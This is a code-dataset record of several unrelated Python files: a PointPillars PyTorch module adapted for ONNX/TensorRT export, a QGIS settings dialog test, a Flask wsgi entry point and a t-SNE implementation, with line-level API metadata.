% (lat, long)\n\t\t\t\t\t\n\t\t\t\tx += 1\n\tcon.commit()\n\tlog(\"\\tChanges Committed to DataBase\", infoLog)\n\treturn 1\n\t\t\t\n#------------------------------Config--------------------------------------#\ndef configSectionMap(section):\n\tdict1 = {}\n\toptions = config.options(section)\n\tfor option in options:\n\t\ttry:\n\t\t\tdict1[option] = config.get(section, option)\n\t\t\tif dict1[option] == -1:\n\t\t\t\tDebugPrint(\"skip: %s\" % option)\n\t\texcept:\n\t\t\tprint(\"exception on %s!\" % option)\n\t\t\tdict1[option] = None\n\treturn dict1\n\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\n\t\nTEMPDBNAME = configSectionMap(\"DatabaseConfiguration\")['tempdb']\nTEMPTABLENAME = configSectionMap(\"DatabaseConfiguration\")['temptable']\nc2p = configSectionMap(\"DSTKConfiguration\")['c2p']\nerrorLog = configSectionMap(\"Logging\")['error']\ninfoLog = configSectionMap(\"Logging\")['info']\nif not os.path.isfile(TEMPDBNAME):\n\tcon = sqlite3.connect(TEMPDBNAME)\n\tcur = con.cursor()\n\tpopulateDatabase()\n\nelse:\n\tcon = sqlite3.connect(TEMPDBNAME)\n\tcur = con.cursor()\n\t\n#--------------------------END Config-----------------------------------#\n\t\t\n# ----------------------------------------- MAIN --------------------------------- # \nuniqueCoordinateList = getUniqueCoordinates()\ndstkCompare(uniqueCoordinateList, c2p)\n\t\n\n\n\t\n", "sub_path": "modules.py", "file_name": "modules.py", "file_ext": "py", "file_size_in_byte": 5539, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "csv.reader", "line_number": 26, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 55, "usage_type": "call"}, {"api_name": "urllib.quote", "line_number": 92, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 95, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 97, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 144, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path", "line_number": 152, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 153, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 158, "usage_type": "call"}]} +{"seq_id": "86568935", "text": "\"\"\"\nPointPillars fork from SECOND.\nCode written by Alex Lang and Oscar Beijbom, 2018.\nLicensed under MIT License [see LICENSE].\n\"\"\"\n\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\nfrom second.pytorch.utils import get_paddings_indicator\nfrom torchplus.nn import Empty\nfrom torchplus.tools import change_default_args\nfrom .pointpillars import PFNLayer\n\n\nclass PFNLayerForCudaImplementation(nn.Module):\n def __init__(self,\n in_channels,\n out_channels,\n use_norm=True,\n last_layer=False):\n \"\"\"\n Pillar Feature Net Layer. Add batch size to fit tensorrt\n Modified batchnorm 1d -> 2d to fit tensorrt\n :param in_channels: . Number of input channels.\n :param out_channels: . Number of output channels.\n :param use_norm: . Whether to include BatchNorm.\n :param last_layer: . If last_layer, there is no concatenation of features.\n \"\"\"\n super().__init__()\n self.name = 'PFNLayer'\n self.last_vfe = last_layer\n if not self.last_vfe:\n out_channels = out_channels // 2\n self.units = out_channels\n\n if use_norm:\n # Have to use BatchNorm2d since 1d, 1, 1200000, 64 , 1200000is too long\n BatchNorm1d = change_default_args(eps=1e-3, momentum=0.01)(nn.BatchNorm2d)\n # Linear = change_default_args(bias=False)(nn.Linear)\n Conv = change_default_args(bias=False)(nn.Conv2d)\n else:\n BatchNorm1d = Empty\n # Linear = change_default_args(bias=True)(nn.Linear)\n Conv = change_default_args(bias=False)(nn.Conv2d)\n\n self.norm = BatchNorm1d(self.units)\n self.conv = Conv(in_channels, self.units, 1)\n # replace max\n self.dilaconv = Conv(self.units, self.units, (1, 34), dilation=(1, 3))\n\n def forward(self, inputs):\n # ############# the conversion is obeying the rule:\n ############### tensorrt is not supporting much of indexing, broadcasting, and wired batching\n # the following struct\n # (1, 12000, 100, 4)\n x = self.conv(inputs)\n x = self.norm(x)\n x = F.relu(x)\n # replace max to dilated conv\n # x_max = torch.max(x, dim=1, keepdim=True)[0]\n\n x_max = self.dilaconv(x)\n if self.last_vfe:\n return x_max\n\n\nclass PillarFeatureNetForCudaImplementation(nn.Module):\n def __init__(self,\n num_input_features=4,\n use_norm=True,\n num_filters=(64,),\n with_distance=False,\n voxel_size=(0.2, 0.2, 4),\n pc_range=(0, -40, -3, 70.4, 40, 1)):\n \"\"\"\n Modified Pillar Feature Net to match the c++ codes.\n :param num_input_features: . Number of input features, either x, y, z or x, y, z, r.\n :param use_norm: . Whether to include BatchNorm.\n :param num_filters: (: N). Number of features in each of the N PFNLayers.\n :param with_distance: . Whether to include Euclidean distance to points.\n :param voxel_size: (: 3). Size of voxels, only utilize x and y size.\n :param pc_range: (: 6). Point cloud range, only utilize x and y min.\n \"\"\"\n\n super().__init__()\n self.name = 'PillarFeatureNet'\n assert len(num_filters) > 0\n num_input_features += 5\n if with_distance:\n num_input_features += 1\n self._with_distance = with_distance\n\n # Create PillarFeatureNet layers\n num_filters = [num_input_features] + list(num_filters)\n pfn_layers = []\n for i in range(len(num_filters) - 1):\n in_filters = num_filters[i]\n out_filters = num_filters[i + 1]\n if i < len(num_filters) - 2:\n last_layer = False\n else:\n last_layer = True\n pfn_layers.append(PFNLayerForCudaImplementation(in_filters, out_filters, use_norm, last_layer=last_layer))\n self.pfn_layers = nn.ModuleList(pfn_layers)\n\n # Need pillar (voxel) size and x/y offset in order to calculate pillar offset\n self.vx = voxel_size[0]\n self.vy = voxel_size[1]\n self.x_offset = self.vx / 2 + pc_range[0]\n self.y_offset = self.vy / 2 + pc_range[1]\n\n def forward(self,\n dev_pillar_x_, dev_pillar_y_, dev_pillar_z_, dev_pillar_i_,\n dev_num_points_per_pillar_, dev_x_coors_for_sub_shaped_, dev_y_coors_for_sub_shaped_,\n dev_pillar_feature_mask_):\n \"\"\"\n The c++ code inputs\n :param dev_pillar_x_: (2, 1, 12000, 100)\n :param dev_pillar_y_: (2, 1, 12000, 100)\n :param dev_pillar_z_: (2, 1, 12000, 100)\n :param dev_pillar_i_: (2, 1, 12000, 100)\n :param dev_num_points_per_pillar_: num_voxels in pytorch code, (2, 1, 12000), the only one without 100\n :param dev_x_coors_for_sub_shaped_: (2, 1, 12000, 100)\n :param dev_y_coors_for_sub_shaped_: (2, 1, 12000, 100)\n :param dev_pillar_feature_mask_: (2, 1, 12000, 100) point wise mask\n :return:\n \"\"\"\n # train reshape, onnx conersion not necessary\n dev_num_points_per_pillar_= torch.reshape(dev_num_points_per_pillar_, (dev_pillar_x_.shape[0], 1, 12000, 1))\n\n xyz = torch.cat([dev_pillar_x_, dev_pillar_y_, dev_pillar_z_], dim=1)\n xyz_mean = xyz.sum(dim=3, keepdim=True) / dev_num_points_per_pillar_\n xyz_submean = xyz - xyz_mean\n '''\n # check if have nan\n def check_is_nan(input):\n is_nan = torch.isnan(input)\n print(torch.sum(torch.isnan(input)))\n print(input[is_nan][0])\n exit()\n check_is_nan(x_submean)\n '''\n # ############ work above ###############################\n # trt is not supporting broadcasting sometimes\n vx = torch.tensor(self.vx, device=\"cuda\", dtype=torch.float).view(1, 1, 1, 1)\n vy = torch.tensor(self.vy, device=\"cuda\", dtype=torch.float).view(1, 1, 1, 1)\n x_offset = torch.tensor(self.x_offset, device=\"cuda\", dtype=torch.float).view(1, 1, 1, 1)\n y_offset = torch.tensor(self.y_offset, device=\"cuda\", dtype=torch.float).view(1, 1, 1, 1)\n x_center = dev_x_coors_for_sub_shaped_ * vx + x_offset\n y_center = dev_y_coors_for_sub_shaped_ * vy + y_offset\n\n # Find distance of x, y, and z from pillar center\n x_subcenter = dev_pillar_x_ - x_center\n y_subcenter = dev_pillar_y_ - y_center\n features_ls = [xyz, dev_pillar_i_, xyz_submean,\n x_subcenter, y_subcenter]\n\n features = torch.cat(features_ls, dim=1)\n features_masked = features.mul(dev_pillar_feature_mask_)\n\n # Forward pass through PFNLayers\n for pfn in self.pfn_layers:\n features_out = pfn(features_masked)\n # return features_out.squeeze() can not simply squeeze because the batch sometimes is 1!!\n return torch.squeeze(features_out, 3)\n\n\nclass PointPillarsScatterForCudaImpmentation(nn.Module):\n def __init__(self,\n output_shape,\n num_input_features=64):\n \"\"\"\n Point Pillar's Scatter.\n add batch dimension\n :param output_shape: ([int]: 4). Required output shape of features.\n :param num_input_features: . Number of input features.\n \"\"\"\n\n super().__init__()\n self.name = 'PointPillarsScatter'\n self.output_shape = output_shape\n self.ny = output_shape[2]\n self.nx = output_shape[3]\n self.nchannels = num_input_features\n\n def forward(self, voxel_features, coords, batch_size):\n # now the voxel_features is (2, 12000, 64) instead of (xxx, 64)\n # batch_canvas will be the final output.\n # [2, 64, 12000] -> [2, 12000, 64]\n voxel_features = voxel_features.permute(0, 2, 1).contiguous()\n batch_canvas = []\n for batch_itt in range(batch_size):\n # Create the canvas for this sample\n canvas = torch.zeros(self.nchannels, self.nx * self.ny, dtype=voxel_features.dtype,\n device=voxel_features.device)\n\n # Only include non-empty pillars\n batch_mask = coords[:, 0] == batch_itt\n this_coords = coords[batch_mask, :]\n non_empty_pillar_num = this_coords.shape[\n 0] # one error: orginal pfe final squeeze is not considering batchsize==1\n # print(\"nonempty pillar num vs feature dims: \", non_empty_pillar_num, voxel_features.shape)\n indices = this_coords[:, 2] * self.nx + this_coords[:, 3]\n indices = indices.type(torch.long)\n\n # take out the batch\n voxels = voxel_features[batch_itt, :non_empty_pillar_num, :]\n voxels = voxels.t()\n # Now scatter the blob back to the canvas.\n canvas[:, indices] = voxels\n # Append to a list for later stacking.\n batch_canvas.append(canvas)\n\n # Stack to 3-dim tensor (batch-size, nchannels, nrows*ncols)\n batch_canvas = torch.stack(batch_canvas, 0)\n\n # Undo the column stacking to final 4-dim tensor\n batch_canvas = batch_canvas.view(batch_size, self.nchannels, self.ny, self.nx)\n return batch_canvas\n", "sub_path": "second/pytorch/models/pointpillars_for_offical_onnx_and_cuda.py", "file_name": "pointpillars_for_offical_onnx_and_cuda.py", "file_ext": "py", "file_size_in_byte": 9373, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "torch.nn.Module", "line_number": 17, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torchplus.tools.change_default_args", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 40, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 40, "usage_type": "name"}, {"api_name": "torchplus.tools.change_default_args", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn.Conv2d", "line_number": 42, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "name"}, {"api_name": "torchplus.nn.Empty", "line_number": 44, "usage_type": "name"}, {"api_name": "torchplus.tools.change_default_args", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn.Conv2d", "line_number": 46, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 46, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 60, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 69, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 69, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 106, "usage_type": "name"}, {"api_name": "torch.reshape", "line_number": 131, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 147, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 147, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 148, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 148, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 149, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 149, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 150, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 150, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 160, "usage_type": "call"}, {"api_name": "torch.squeeze", "line_number": 167, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 170, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 170, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 196, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 206, "usage_type": "attribute"}, {"api_name": "torch.stack", "line_number": 217, "usage_type": "call"}]} +{"seq_id": "121712966", "text": "#-----------------------------------------------------------\n#\n# QGIS Setting Manager\n# Copyright (C) 2016 Denis Rouzaud\n#\n#-----------------------------------------------------------\n#\n# licensed under the terms of GNU GPL 2\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along\n# with this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n#---------------------------------------------------------------------\n\nfrom PyQt5.QtWidgets import QDialog, QDoubleSpinBox, QComboBox, QListWidget, QGridLayout\nfrom qgis.core import QgsTolerance\nfrom qgis.gui import QgsCollapsibleGroupBox\nfrom ..setting_dialog import SettingDialog, UpdateMode\nfrom .my_settings import MySettings\n\n\nclass MySettingsDialog(QDialog, SettingDialog):\n def __init__(self, setting_name, widget_class, mode: UpdateMode=UpdateMode.DialogAccept, init_widget=None):\n \"\"\"\n\n :param setting_name:\n :param widget_class:\n :param mode:\n :param init_widget: some initializing code for the widget\n \"\"\"\n\n settings = MySettings()\n\n QDialog.__init__(self, setting_manager=settings, mode=mode)\n SettingDialog.__init__(self, setting_manager=settings, mode=mode)\n\n #super(QDialog, self).__init__(setting_manager=settings, mode=mode)\n self.DEBUG = True\n\n self.widget = widget_class(self)\n self.widget.setObjectName(setting_name)\n\n if init_widget:\n # print(\"running init_widget lambda\")\n init_widget(self.widget)\n\n self.settings = settings\n self.init_widgets()\n", "sub_path": "test/my_settings_dialog.py", "file_name": "my_settings_dialog.py", "file_ext": "py", "file_size_in_byte": 2140, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 33, "usage_type": "name"}, {"api_name": "setting_dialog.SettingDialog", "line_number": 33, "usage_type": "name"}, {"api_name": "setting_dialog.UpdateMode", "line_number": 34, "usage_type": "name"}, {"api_name": "setting_dialog.UpdateMode.DialogAccept", "line_number": 34, "usage_type": "attribute"}, {"api_name": "my_settings.MySettings", "line_number": 43, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QDialog.__init__", "line_number": 45, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 45, "usage_type": "name"}, {"api_name": "setting_dialog.SettingDialog.__init__", "line_number": 46, "usage_type": "call"}, {"api_name": "setting_dialog.SettingDialog", "line_number": 46, "usage_type": "name"}]} +{"seq_id": "430449279", "text": "import os\nimport socket\n\nfrom config import configs\nfrom freenit import create_app\n\nconfig_name = os.getenv('FLASK_ENV') or 'default'\nconfig = configs[config_name]\napp = create_app(config)\nhostname = socket.gethostname()\nport = os.environ.get('FLASK_PORT', 5000)\nSWAGGER_PATH = f'{config.OPENAPI_URL_PREFIX}{config.OPENAPI_SWAGGER_UI_PATH}'\nSWAGGER_URL = f'http://{hostname}:{port}{SWAGGER_PATH}'\n\nif __name__ == '__main__':\n print(' * Swagger URL:', SWAGGER_URL)\n app.run(\n host='0.0.0.0',\n port=port,\n debug=True,\n use_reloader=True,\n )\n", "sub_path": "wsgi.py", "file_name": "wsgi.py", "file_ext": "py", "file_size_in_byte": 576, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.getenv", "line_number": 7, "usage_type": "call"}, {"api_name": "config.configs", "line_number": 8, "usage_type": "name"}, {"api_name": "freenit.create_app", "line_number": 9, "usage_type": "call"}, {"api_name": "socket.gethostname", "line_number": 10, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 11, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 11, "usage_type": "attribute"}, {"api_name": "config.OPENAPI_URL_PREFIX", "line_number": 12, "usage_type": "attribute"}, {"api_name": "config.OPENAPI_SWAGGER_UI_PATH", "line_number": 12, "usage_type": "attribute"}]} +{"seq_id": "447324661", "text": "### tSNE implementation ###\nimport numbers\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy as sp\nimport scipy.spatial.distance\nMACHINE_EPSILON = np.finfo(np.double).eps\n\nimport misc, gd, plots, setup\n\ndef joint_probabilities(distances, perplexity):\n \"\"\"\\\n Computes the joint probabilities p_ij from distances D.\n\n Parameters\n ----------\n\n distances : array, shape (n_samples*(n_samples-1)/2,)\n Condensed distances.\n\n perpelxity : float, >0\n Desired perpelxity of the joint probability distribution.\n \n Returns\n -------\n\n P : array, shape (N*(N-1)/2),)\n Condensed joint probability matrix.\n \"\"\"\n distances = scipy.spatial.distance.squareform(distances)\n n_samples = len(distances)\n #Find optimal neighborhood parameters to achieve desired perplexity\n lower_bound=1e-2; upper_bound=1e2; iters=10 #parameters for binary search\n sigma = np.empty(n_samples) #bandwith array\n for i in range(n_samples):\n #initialize bandwith parameter for sample i:\n sigma_i = (lower_bound*upper_bound)**(1/2)\n for iter in range(iters):\n #distances to sample i, not including self:\n D_i = np.delete(distances[i],i) \n #compute array with conditional probabilities w.r.t. sample i:\n P_i = np.exp(-D_i**2/(2*sigma_i**2))\n P_i /= np.sum(P_i) ####\n #compute perplexity w.r.t sample i:\n HP_i = -np.dot(P_i,np.log2(P_i+MACHINE_EPSILON))\n PerpP_i = 2**(HP_i)\n #update bandwith parameter for sample i:\n if PerpP_i > perplexity:\n upper_bound = sigma_i\n else:\n lower_bound = sigma_i\n #final bandwith parameter for sample i:\n sigma[i] = (lower_bound*upper_bound)**(1/2)\n\n conditional_P = np.exp(-distances**2/(2*sigma**2))\n np.fill_diagonal(conditional_P,0)\n conditional_P /= np.sum(conditional_P,axis=1)\n \n P = conditional_P + conditional_P.T\n sum_P = np.maximum(np.sum(P), MACHINE_EPSILON)\n P = np.maximum(scipy.spatial.distance.squareform(P)/sum_P, MACHINE_EPSILON)\n return P\n\n### Cost function and gradient ###\n\ndef KL(P,embedding):\n \"\"\"\\\n KL divergence KL(P||Q) between distributions P and Q, where Q is computed\n from the student-t distribution from the given embedding array.\n\n Parameters\n ----------\n\n P : array, shape (n_samples*(n_samples-1)/2,)\n Condensed probability array.\n \n embedding : array, shape (n_samples,dim)\n Current embedding.\n\n Results\n -------\n\n kl_divergence : float\n KL-divergence KL(P||Q).\n \"\"\"\n # compute Q:\n dist = scipy.spatial.distance.pdist(embedding,metric='sqeuclidean')\n dist += 1.0\n dist **= -1.0\n Q = np.maximum(dist/(2.0*np.sum(dist)), MACHINE_EPSILON)\n \n kl_divergence = 2.0 * np.dot(\n P, np.log(np.maximum(P, MACHINE_EPSILON) / Q))\n \n return kl_divergence\n\ndef grad_KL(P,embedding,only_gradient=False):\n \"\"\"\\\n Computes KL divergence and its gradient at the given embedding.\n\n Parameters\n ----------\n\n P : array, shape (n_samples*(n_samples-1)/2,)\n Condensed probability array.\n \n embedding : array, shape (n_samples,dim)\n Current embedding.\n\n Results\n -------\n\n kl_divergence : float\n KL-divergence KL(P||Q).\n\n grad : float\n gradiet of KL(P||Q(X)) w.r.t. X.\n \"\"\"\n dist = scipy.spatial.distance.pdist(embedding,metric='sqeuclidean')\n dist += 1.0\n dist **= -1.0\n Q = np.maximum(dist/(2.0*np.sum(dist)), MACHINE_EPSILON) ######\n \n kl_divergence = 2.0 * np.dot(\n P, np.log(np.maximum(P, MACHINE_EPSILON) / Q))\n\n grad = np.ndarray(embedding.shape)\n PQd = scipy.spatial.distance.squareform((P-Q)*dist)\n for i in range(len(embedding)):\n grad[i] = np.dot(np.ravel(PQd[i],order='K'),embedding[i]-embedding)\n grad *= 4\n \n return grad, kl_divergence\n\ndef batch_gradient(P, embedding, batch_size=10, indices=None, weights=None,\n return_objective=True):\n \"\"\"\\\n Returns gradient approximation.\n \"\"\"\n n_samples = len(embedding)\n if indices is None:\n indices = np.arange(n_samples)\n np.random.shuffle(indices)\n else:\n assert len(indices) == n_samples\n grad = np.empty(embedding.shape)\n stress = 0\n for start in range(0, n_samples, batch_size):\n end = min(start+batch_size,n_samples)\n batch_idx = np.sort(indices[start:end])\n embedding_batch = embedding[batch_idx]\n P_batch = P[setup.batch_indices(batch_idx,n_samples)]\n grad[batch_idx], st0 = grad_KL(P_batch,\n embedding_batch)\n stress += st0\n\n return grad, stress\n\nclass TSNE(object):\n \"\"\"\\\n Class to solve tsne problems\n \"\"\"\n def __init__(self, data, dim=2, perplexity=30.0, sample_colors=None,\n verbose=0,\n indent='', title='', **kwargs):\n \"\"\"\\\n Initializes TSNE object.\n\n Parameters\n ----------\n\n data : array or dictionary\n Contains distances or dissimilarities among a set of objects.\n Can be either of the following:\n\n i) array, shape (N x N)\n Distance/dissimilarity matrix\n \n ii) array, shape (N x dim)\n Positions/featurs\n\n iii) dictionary\n See dissimilarities.py\n\n dim : int > 0\n Embedding dimension.\n\n perplexity : float > 0\n Perplexity used in determining the conditional probabilities p(i|j).\n \"\"\"\n if verbose > 0:\n print(indent+'mview.TSNE():')\n\n self.sample_colors = sample_colors\n self.verbose = verbose; self.title = title; self.indent = indent\n \n self.distances = setup.setup_distances(data)\n self.n_samples = scipy.spatial.distance.num_obs_y(self.distances)\n self.N = self.n_samples\n self.D = self.distances\n\n assert isinstance(dim,int); assert dim > 0\n self.dim = dim\n\n if verbose > 0:\n print(indent+' data details:')\n print(indent+f' number of samples : {self.n_samples}')\n print(indent+' embedding details:')\n print(indent+f' embedding dimension : {dim}')\n print(indent+f' perplexity : {perplexity:0.2f}')\n\n self.P = joint_probabilities(self.D,perplexity)\n\n self.objective = lambda X, P=self.P, **kwargs : KL(P,X)\n def gradient(embedding,batch_size=None,indices=None,**kwargs):\n if batch_size is None or batch_size >= self.n_samples:\n return grad_KL(self.P,embedding)\n else:\n return batch_gradient(self.P,embedding,batch_size,indices)\n self.gradient = gradient\n\n self.initialize()\n\n def set_sigma(self,sigma='optimal',perplexity=30.0):\n if isinstance(sigma,numbers.Number):\n assert sigma > 0\n self.sigma = np.ones(self.N)*sigma\n elif isinstance(sigma,np.ndarray):\n assert sigma.shape == (self.N,)\n assert all(sigma>0)\n self.sigma = sigma\n else:\n assert sigma is 'optimal'\n assert isinstance(perplexity,numbers.Number)\n assert perplexity > 0\n self.perplexity = perplexity\n self.sigma = find_sigma(self.D,self.perplexity)\n\n def initialize(self, X0=None, **kwargs):\n \"\"\"\\\n Set initial embedding.\n \"\"\"\n if self.verbose > 0:\n print(f' MDS.initialize({self.title}):')\n \n if X0 is None:\n X0 = misc.initial_embedding(self.N,dim=self.dim,\n radius=1,**kwargs)\n #radius=self.D['rms'],**kwargs)\n if self.verbose > 0:\n print(' method : random')\n else:\n assert isinstance(X0,np.ndarray)\n assert X0.shape == (self.N,self.dim)\n if self.verbose > 0:\n print(' method : initialization given')\n \n self.embedding = X0\n self.update(**kwargs)\n self.embedding0 = self.embedding.copy()\n \n if self.verbose > 0:\n print(f' initial cost : {self.cost:0.2e}')\n\n\n def update(self,**kwargs):\n self.cost = self.objective(self.embedding)\n\n def gd(self, batch_size=None, **kwargs):\n if self.verbose > 0:\n print(self.indent+' TSNE.gd():')\n print(self.indent+' specs:')\n\n if batch_size is None or batch_size >= self.n_samples:\n Xi = None\n F = lambda embedding : self.gradient(embedding)\n if self.verbose > 0:\n print(self.indent+' gradient type : full')\n else:\n def Xi():\n indices = np.arange(self.n_samples)\n np.random.shuffle(indices)\n xi = {\n 'indices' : indices\n }\n return xi\n F = lambda X, indices : self.gradient(X,batch_size,indices)\n if self.verbose > 0:\n print(self.indent+' gradient type : batch')\n print(self.indent+' batch size :',batch_size)\n\n self.embedding, H = gd.single(self.embedding,F,Xi=Xi,\n verbose=self.verbose,\n indent=self.indent+' ',\n **kwargs)\n self.update()\n if self.verbose > 0:\n print(self.indent+f' final stress : {self.cost:0.2e}')\n \n def plot_embedding(self,title='',edges=False,colors='default',labels=None,\n axis=True,plot=True,ax=None,**kwargs):\n assert self.dim >= 2\n if ax is None:\n fig, ax = plt.subplots()\n else:\n plot = False\n if edges is True:\n edges = self.D['edge_list']\n elif edges is False:\n edges = None\n if colors == 'default':\n colors = self.sample_colors\n plots.plot2D(self.embedding,edges=edges,colors=colors,labels=labels,\n axis=axis,ax=ax,title=title,**kwargs)\n if plot is True:\n plt.draw()\n plt.pause(1)\n\n\n### TESTS ###\n\ndef example_tsne(**kwargs):\n X_true = np.load('examples/123/true2.npy')#[0:500]\n colors = misc.labels(X_true)\n from scipy import spatial\n D = spatial.distance_matrix(X_true,X_true)\n\n vis = TSNE(D,verbose=2,perplexity=50,sample_colors=colors)\n vis.initialize(X0=X_true)\n vis.plot_embedding()\n vis.gd(plot=True,**kwargs)\n vis.plot_embedding()\n plt.show()\n\ndef sk_tsne():\n\n X_true = np.load('examples/123/true2.npy')#[0:500]\n from scipy import spatial\n D = spatial.distance_matrix(X_true,X_true)\n \n from sklearn.manifold import TSNE as tsne\n X_embedded = tsne(n_components=2,verbose=2,method='exact').fit_transform(X_true)\n plt.figure()\n plt.plot(X_embedded[:,0],X_embedded[:,1],'o')\n plt.show()\n \nif __name__=='__main__':\n print('mview.tsne : tests')\n example_tsne()\n \n", "sub_path": "MPSE/mview/tsne.py", "file_name": "tsne.py", "file_ext": "py", "file_size_in_byte": 11084, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "numpy.finfo", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.double", "line_number": 7, "usage_type": "attribute"}, {"api_name": "scipy.spatial.distance.squareform", "line_number": 30, "usage_type": "call"}, {"api_name": "scipy.spatial", "line_number": 30, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.log2", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.fill_diagonal", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 61, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.squareform", "line_number": 61, "usage_type": "call"}, {"api_name": "scipy.spatial", "line_number": 61, "usage_type": "attribute"}, {"api_name": "scipy.spatial.distance.pdist", "line_number": 87, "usage_type": "call"}, {"api_name": "scipy.spatial", "line_number": 87, "usage_type": "attribute"}, {"api_name": "numpy.maximum", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 93, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.pdist", "line_number": 119, "usage_type": "call"}, {"api_name": "scipy.spatial", "line_number": 119, "usage_type": "attribute"}, {"api_name": "numpy.maximum", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 127, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.squareform", "line_number": 128, "usage_type": "call"}, {"api_name": "scipy.spatial", "line_number": 128, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.ravel", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 143, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 150, "usage_type": "call"}, {"api_name": "setup.batch_indices", "line_number": 152, "usage_type": "call"}, {"api_name": "setup.setup_distances", "line_number": 197, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.num_obs_y", "line_number": 198, "usage_type": "call"}, {"api_name": "scipy.spatial", "line_number": 198, "usage_type": "attribute"}, {"api_name": "numbers.Number", "line_number": 225, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 228, "usage_type": "attribute"}, {"api_name": "numbers.Number", "line_number": 234, "usage_type": "attribute"}, {"api_name": "misc.initial_embedding", 